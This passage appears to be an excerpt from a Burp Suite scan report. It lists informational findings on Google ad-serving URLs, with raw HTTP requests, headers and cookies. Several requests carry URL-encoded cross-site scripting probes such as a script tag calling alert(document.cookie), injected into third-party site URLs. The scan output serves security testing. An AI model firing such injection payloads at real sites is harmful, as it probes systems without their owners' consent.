GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.103. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024385&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002785618&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=2&dtd=5&xpc=bZOblEKbVK&p=http%3A//www.worldmastiffforum.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.worldmastiffforum.com/%253Fd11e2%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253Ef6a009cb502%253D1%26hl%3Den%26client%3Dca-pub-5638914851100523%26adU%3Dwww.LogRhythm.com%26adT%3DPCI%2BDSS%2BCompliance%2BInfo%26adU%3Dwww.AriaSystems.com%26adT%3DOnline%2BPayment%2BSimplified%26adU%3Dwww.Axway.com%26adT%3DFree%2BB2B%2BIT%2BCase%2BStudy%26adU%3Dwww.FirstData.com/WhitePaper%26adT%3DPCI%2BDSS%2BCompliance%26gl%3DUS&usg=AFQjCNH-0QewtD-YDPL-InhNq1X23ePyHQ

Request

GET /pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024385&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002785618&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=2&dtd=5&xpc=bZOblEKbVK&p=http%3A//www.worldmastiffforum.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

17.104. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528728&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=250x250_as&correlator=1296570528580&pv_ch=9785752589%2B&frm=0&adk=3406728932&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=2&dtd=4&xpc=gzOoabzJJ8&p=http%3A//www.montanaplates.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html%26hl%3Den%26client%3Dca-pub-0993147863874386%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DLegalZoom.com/LLC%26adT%3DLLCs%2Bin%2B3%2BEasy%2BSteps%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26gl%3DUS&usg=AFQjCNFEKzLakTjF_hx8tNjpMkZO0qMbzg

Request

Response

17.105. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528513&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296570528580&frm=0&adk=3476469855&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=1&dtd=209&xpc=sUcELk5FrH&p=http%3A//www.montanaplates.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html%26hl%3Den%26client%3Dca-pub-0993147863874386%26adU%3Dwww.Moxiesoft.com%26adT%3DIntegrating%2BLive%2BChat%253F%26adU%3Dwww.Pfaltzgraff.com%26adT%3DPfaltzgraff%25C2%25AE%2BDinnerware%26adU%3Dwww.peerlesssteel.com%26adT%3DPeerless%2BSteel%2B-%2BMI%2B%2526amp%253B%2BOH%26gl%3DUS&usg=AFQjCNGDVatfl9zkPEPKaXHWF44aoS1Xdw

Request

Response

17.106. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6045830449&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185758&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185788&frm=1&adk=2903642409&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=100090921&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3438480888&fu=4&ifi=1&dtd=36

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3Dwww.Moxiesoft.com%26adT%3DMoxie%2BLive%2BChat%2BSolutions%26adU%3Dwww.gfi.com%26adT%3DMailArchiver%2BWhitepaper%26adU%3Dwww.EarthLink.net/Web-Hosting%26adT%3DEarthLink%2BWeb%2BHosting%26gl%3DUS&usg=AFQjCNENBNkoarQs7-8uFNIzHPLxFysUsg

Request

GET /pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6045830449&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185758&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185788&frm=1&adk=2903642409&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=100090921&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3438480888&fu=4&ifi=1&dtd=36 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/nb728.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.107. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6087885694&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185759&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185791&frm=1&adk=1016365894&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=1398094128&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3082672102&eid=30143102&fu=4&ifi=1&dtd=44

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3Dwww.Moxiesoft.com%26adT%3DMoxie%2BLive%2BChat%2BSolutions%26adU%3Dwww.gfi.com%26adT%3DGFI%2BLANguard%26adU%3Dearthlink.net/web-hosting/%26adT%3DEarthLink%2BWeb%2BHosting%26gl%3DUS&usg=AFQjCNHMYySnZZkfIr2w76ydNg10qwwgYg

Request

GET /pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6087885694&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185759&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185791&frm=1&adk=1016365894&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=1398094128&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3082672102&eid=30143102&fu=4&ifi=1&dtd=44 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.robtex.com/ext/ads/nt728.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.108. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698945&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D558297&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677345872&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677340510&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=2&dtd=41&xpc=UGj0GilDIl&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.gfi.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGyKsK2oBQ1NjarJGOamv9SgjV8CQ

Request

GET /pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698945&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D558297&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677345872&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677340510&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=2&dtd=41&xpc=UGj0GilDIl&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.109. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024427&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002827736&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786&correlator=1297002827693&frm=0&adk=3799866133&ga_vid=1997205418.1297002828&ga_sid=1297002828&ga_hid=2047477175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F75&fu=0&ifi=2&dtd=3&xpc=7kzgbJzv3L&p=http%3A//www.worldmastiffforum.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.worldmastiffforum.com/%253Fd11e2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ef6a009cb502%253D1%26hl%3Den%26client%3Dca-pub-5638914851100523%26adU%3Dwww.LogRhythm.com%26adT%3DPCI%2BDSS%2BCompliance%2BInfo%26gl%3DUS&usg=AFQjCNH4mXA8y8rEKCmGiIsfWBEES258Ew

Request

GET /pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024427&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002827736&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786&correlator=1297002827693&frm=0&adk=3799866133&ga_vid=1997205418.1297002828&ga_sid=1297002828&ga_hid=2047477175&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F75&fu=0&ifi=2&dtd=3&xpc=7kzgbJzv3L&p=http%3A//www.worldmastiffforum.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6a009cb502=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

17.110. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1296698618&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsecure.avanegate.com.html&dt=1296677018664&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677018689&frm=0&adk=1607234649&ga_vid=1501870982.1296677019&ga_sid=1296677019&ga_hid=1896820519&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=969&fu=0&ifi=1&dtd=193&xpc=940X3IE764&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/secure.avanegate.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Peachtree.com%26adT%3DPeachtree%2BQuantum%2B2011%26adU%3Dwww.checkmark.com%26adT%3DAccounting%2BSoftware%26adU%3Dwww.Grammarly.com/Grammar_Checker%26adT%3DInstant%2BGrammar%2BChecker%26gl%3DUS&usg=AFQjCNGy7Pz-FgH8G_YMlsO4X-ZiplsUjg

Request

Response

17.111. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6087885694&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185759&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185791&frm=1&adk=1016365894&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=1398094128&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3082672102&eid=30143102&fu=4&ifi=1&dtd=44

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3Dwww.dnsmadeeasy.com%26adT%3DEnterprise%2BDNS%2BMade%2BEasy%26adU%3Dwww.eaglerunmcc.com/index.html%26adT%3DBuilding%2BProvider%2BLoyalty%26adU%3Dsedo.com%26adT%3DFOR%2BSALE:%2BResolveName.com%26gl%3DUS&usg=AFQjCNFw2TjuNSMOBMpJubSzexk2p2K76g

Request

Response

17.112. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9079685345082025&output=html&h=90&slotname=6045830449&w=728&region=test&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.robtex.com%2Fdns%2F2mdn.net.html&dt=1296664185758&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296664185788&frm=1&adk=2903642409&ga_vid=327473696.1296664185&ga_sid=1296664185&ga_hid=100090921&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&ifk=3438480888&fu=4&ifi=1&dtd=36

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.robtex.com/dns/2mdn.net.html%26hl%3Den%26client%3Dca-pub-9079685345082025%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFJwxiLvxY-KGw4HZBUq_Rt4Mljrg

Request

Response

17.113. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024384&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002784025&shv=r20101117&jsv=r20110120&saldr=1&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=1&dtd=1589&xpc=GqquadKp09&p=http%3A//www.worldmastiffforum.com

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf

Request

GET /pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024384&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002784025&shv=r20101117&jsv=r20110120&saldr=1&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=1&dtd=1589&xpc=GqquadKp09&p=http%3A//www.worldmastiffforum.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
